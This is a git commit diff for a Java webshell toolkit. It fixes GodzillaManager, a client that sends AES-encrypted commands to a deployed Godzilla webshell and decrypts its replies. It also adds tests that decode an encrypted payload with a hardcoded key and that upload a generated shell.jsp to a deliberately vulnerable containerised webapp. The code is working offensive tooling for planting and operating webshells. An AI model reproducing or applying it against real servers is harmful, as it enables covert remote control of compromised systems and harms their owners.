fix: godzilla manager test failed

Author: ReaJason

generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java

@@ -29,7 +29,7 @@
 public class GodzillaManager implements Closeable {
     private final OkHttpClient client;
     private static final List<String> CLASS_NAMES;
-    private String J_SESSION_ID = "";
+    private String cookie = "";
     private String entrypoint;
     private String key;
     private String pass;
@@ -96,18 +96,18 @@ public GodzillaManager() {
     }
 
     private Response post(byte[] bytes) throws IOException {
-        byte[] aes = aes(bytes, true);
+        byte[] aes = aes(this.key, bytes, true);
         assert aes != null;
         String base64String = Base64.encodeBase64String(aes);
         RequestBody requestBody = new FormBody.Builder()
-                .add("pass", base64String)
+                .add(this.pass, base64String)
                 .build();
         Request.Builder builder = new Request.Builder()
                 .url(this.entrypoint)
                 .post(requestBody)
                 .headers(Headers.of(this.headers));
-        if (StringUtils.isNotBlank(J_SESSION_ID)) {
-            builder.header("Cookie", J_SESSION_ID);
+        if (StringUtils.isNotBlank(cookie)) {
+            builder.header("Cookie", cookie);
         }
         return client.newCall(builder.build()).execute();
     }
@@ -128,7 +128,7 @@ public boolean start() {
         try (Response response = post(bytes)) {
             String setCookie = response.header("Set-Cookie");
             if (setCookie != null && setCookie.contains("JSESSIONID=")) {
-                J_SESSION_ID = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";"));
+                cookie = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";"));
             }
             return response.code() == 200;
         } catch (IOException e) {
@@ -148,7 +148,6 @@ public boolean test() {
             }
             return false;
         } catch (IOException e) {
-            e.printStackTrace();
             return false;
         }
     }
@@ -172,39 +171,48 @@ public void close() throws IOException {
      * @param encoding 是否为加密，true 为加密，false 解密
      * @return 返回加解密后的字节数组
      */
-    public byte[] aes(byte[] bytes, boolean encoding) {
-        System.out.println(key);
+    public static byte[] aes(String key, byte[] bytes, boolean encoding) {
         try {
             Cipher c = Cipher.getInstance("AES");
-            c.init(encoding ? 1 : 2, new SecretKeySpec(this.key.getBytes(), "AES"));
+            c.init(encoding ? 1 : 2, new SecretKeySpec(key.getBytes(), "AES"));
             return c.doFinal(bytes);
         } catch (Exception e) {
-            e.printStackTrace();
-            return null;
+            return new byte[0];
         }
     }
 
     private boolean isValidResponse(String response) {
         if (StringUtils.isEmpty(response)) {
             return false;
         }
-        return response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16));
+        return response.length() > 32 && response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16));
     }
 
     public String getResultFromRes(String responseBody) throws IOException {
+        if (!isValidResponse(responseBody)) {
+            return responseBody;
+        }
         String result = responseBody.substring(16);
         result = result.substring(0, result.length() - 16);
         byte[] bytes = Base64.decodeBase64(result);
-        byte[] x = aes(bytes, false);
+        byte[] x = aes(this.key, bytes, false);
         GZIPInputStream gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(x));
         return IOUtils.toString(gzipInputStream, StandardCharsets.UTF_8);
     }
 
-    Map<String, String> restorePayload(String payload) throws IOException {
-        String p = URLDecoder.decode(payload, "UTF-8");
+    public static Map<String, String> restorePayload(String key, String payload) {
+        String p = payload;
+        try {
+            String urlDecoded = URLDecoder.decode(payload, "UTF-8");
+            if (StringUtils.isNoneBlank(urlDecoded)) {
+                p = urlDecoded;
+            }
+        } catch (UnsupportedEncodingException ignored) {
+
+        }
         Map<String, String> map = new HashMap<>();
         byte[] bytes = Base64.decodeBase64(p);
-        byte[] x = aes(bytes, false);
+        byte[] x = aes(key, bytes, false);
         ByteArrayInputStream tStream = new ByteArrayInputStream(x);
         ByteArrayOutputStream tp = new ByteArrayOutputStream();
         byte[] lenB = new byte[4];
@@ -215,16 +223,16 @@ Map<String, String> restorePayload(String payload) throws IOException {
                 byte t = (byte) inputStream.read();
                 if (t != -1) {
                     if (t == 2) {
-                        String key = tp.toString();
-                        int read1 = inputStream.read(lenB);
+                        String dataKey = tp.toString();
+                        inputStream.read(lenB);
                         int len = bytesToInt(lenB);
                         byte[] data = new byte[len];
                         int readOneLen = 0;
                         do {
                             read = readOneLen + inputStream.read(data, readOneLen, data.length - readOneLen);
                             readOneLen = read;
                         } while (read < data.length);
-                        map.put(key, new String(data));
+                        map.put(dataKey, new String(data));
                         tp.reset();
                     } else {
                         tp.write(t);
@@ -249,7 +257,7 @@ public static int bytesToInt(byte[] bytes) {
     private byte[] generateMethodCallBytes(String methodName) {
         ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
         try (GZIPOutputStream gzipOutputStream = new GZIPOutputStream(byteArrayOutputStream);) {
-            byte[] value = "close".getBytes();
+            byte[] value = methodName.getBytes();
             gzipOutputStream.write("methodName".getBytes());
             gzipOutputStream.write(2);
             gzipOutputStream.write(intToBytes(value.length));

generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java

@@ -3,6 +3,8 @@
 import com.reajason.javaweb.util.ClassUtils;
 import org.junit.jupiter.api.Test;
 
+import java.util.Map;
+
 import static org.junit.jupiter.api.Assertions.*;
 
 /**
@@ -18,4 +20,12 @@ void generateGodzilla() {
         System.out.println(o.getClass().getName());
         assertNotNull(o);
     }
+
+    @Test
+    void testRestorePayload(){
+        String payload = "k2qs7l3%2F4ZZaGyyrfpBQGg0dXGM%2BFVFxzmCWLnyFEgoPSpSjHre4o1HBHTCFnNDX";
+        String key = "d8ea7326e6ec5916";
+        Map<String, String> map = GodzillaManager.restorePayload(key, payload);
+        assertEquals("test", map.get("methodName"));
+    }
 }

generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java

@@ -52,8 +52,8 @@ private DynamicTest createCustomContainerTest(String imageName) {
                 int port = container.getMappedPort(8080);
                 String url = "http://" + host + ":" + port + "/app";
                 GodzillaShellConfig shellConfig = GodzillaShellConfig.builder()
-                        .pass("pass").key("key")
-                        .headerName("User-Agent").headerValue("test")
+                        .pass("pass123").key("key123")
+                        .headerName("User-Agent").headerValue("hello_integration_test")
                         .build();
                 String jspContent = generateGodzillaFilterJsp(shellConfig);
                 String filename = "shell.jsp";
@@ -99,7 +99,7 @@ private void uploadJspFileToServer(String uploadUrl, String filename, String fil
     }
 
     private void testGodzillaIsOk(String entrypoint, GodzillaShellConfig shellConfig) {
-        try (GodzillaManager godzillaManager = new GodzillaManager.GodzillaManagerBuilder()
+        try (GodzillaManager godzillaManager = GodzillaManager.builder()
                 .entrypoint(entrypoint)
                 .pass(shellConfig.getPass())
                 .key(shellConfig.getKey())

vul-webapp/src/main/webapp/WEB-INF/web.xml

@@ -24,12 +24,12 @@
         <url-pattern>/upload</url-pattern>
     </servlet-mapping>
 
-    <filter>
-        <filter-name>godzilla</filter-name>
-        <filter-class>ErrorHandler</filter-class>
-    </filter>
-    <filter-mapping>
-        <filter-name>godzilla</filter-name>
-        <url-pattern>/test_filter</url-pattern>
-    </filter-mapping>
+    <!--    <filter>-->
+    <!--        <filter-name>godzilla</filter-name>-->
+    <!--        <filter-class>ErrorHandler</filter-class>-->
+    <!--    </filter>-->
+    <!--    <filter-mapping>-->
+    <!--        <filter-name>godzilla</filter-name>-->
+    <!--        <url-pattern>/test_filter</url-pattern>-->
+    <!--    </filter-mapping>-->
 </web-app>